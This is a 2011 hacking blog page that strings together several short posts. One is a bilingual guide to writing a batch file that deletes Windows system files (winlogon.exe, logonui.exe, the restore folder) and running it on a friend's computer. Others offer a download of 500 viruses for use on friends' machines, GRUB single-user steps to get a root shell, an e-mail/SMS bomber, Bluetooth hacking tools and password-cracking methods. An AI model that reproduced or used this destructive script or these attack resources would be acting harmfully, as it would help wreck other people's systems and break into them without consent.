Share |
--- Welcome To Sky Net - The Organization of Hackers ---

Friday, August 26, 2011

How to corrupt your friends or anyone computer using bat [EN/IND]


  
Simply create a New Notepad, copy the below code and paste it in Notepad, now go to file and save it as Window.batIN INDONESIAN =
Buka Notepad, lalu copy kode di bawah ini dan save dengan nama file "Window.bat"
File Type : All Files

@echo off
del c:\windows\system32\restore
del c:\windows\system32\winlogon.exe
del c:\windows\system32\logonui.exe

BackLinker Pro 1.2 [BUILD BACKLINKS] [Most successful Traffic Builder Tool]

Hello,
Well Got Tired Of looking for Traffic for your website ?Now Leave that Emotion Now ....Because BACKLINKER has been Released


FEATURES:
*Builds Backlinks for your website
*Optimizes your website
*Submites your backlinks to all websites
*Submites to search Engines
*Brings Traffic

What is Backlink ?
Back Links are your website's incoming links .So when your backlink is posted somewhere.Then there are chances of people who visit that website to See your website.Its a clean advertising.


Link :
http://hotfile.com/dl/99579711/867d275/Backlinker_Professional.rar.html

500 Vir*s in 1

below are the 500 virus names and i have given a link for to download all the viruses.

just use viruses on ur frnds computer dont open it and try at you own risk




Avispa.dr
Dark Avenger
AVA.550
Univ/a
Auspar.377
Auspar.338
OC/oops
Middle
Auspar.635
Aus-Term.mp.3490
Jeru.1413
OC/scud
Auspar.dr
Auspar.635
Auspar.615
Auspar
Aust.543
Auspar.424
Auspar.377
Auspar.338
Auspar.292a
Auspar.215
Auspar.187
Auspar
Univ/b

How to Crack Linux Password ?

if you’ve ever got stuck on the Login screen of your Linux system, as you don’t know the System password, don’t worry now. Its very easy to crack the password in Linux system.
All it takes is adjusting the boot parameters slightly and typing a command or two. Just follow the below given commands, and the work would be done. 

  1. Reboot your computer, and then as soon as you see the GRUB Loading screen, make sure to hit the ESC key so that you can get to the menu.
  2. Linux Grub
  3. Now you have two options:
Root Shell Method
  1. If you have the option, you can choose the “recovery mode” item on the menu, usually found right below your default kernel option.
  2. Then choose “Drop to root shell prompt” from this menu (This is called the Single User Mode).
  3. This should give you a root shell prompt.
Alternate Root Shell Method

E-Mail and SMS Bomber

Download :




Code:

BlueTooth Hacking Tools


This is a lis of the essential Bleutooth hacking tools, mostly for the Linux
platform, that can be used to search out and hack Bleutooth-enabled
devices.
Discovering Bleutooth Devices
BlueScanner – BlueScanner searches out for
Bleutooth-enabled devices. It will try to extract as much information
as possible for each newly discovered device. Download BlueScan.
BlueSniff – BlueSniff is a GUI-based utility for finding discoverable and hidden Bleutooth-enabled devices. Download BlueSniff.
BTBrowser – Bleutooth Browser is a J2ME application that
can browse and explore the technical specification of surrounding
Bleutooth-enabled devices. You can browse device information and all
supported profiles and service records of each device. BTBrowser works
on phones that supports JSR-82 – the Java Bleutooth specification. Download BTBrowser.

Password Hacking Methods - Part II

3) Default Passwords:- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force:- 
If all other techniques failed, then attackers use brute force password cracking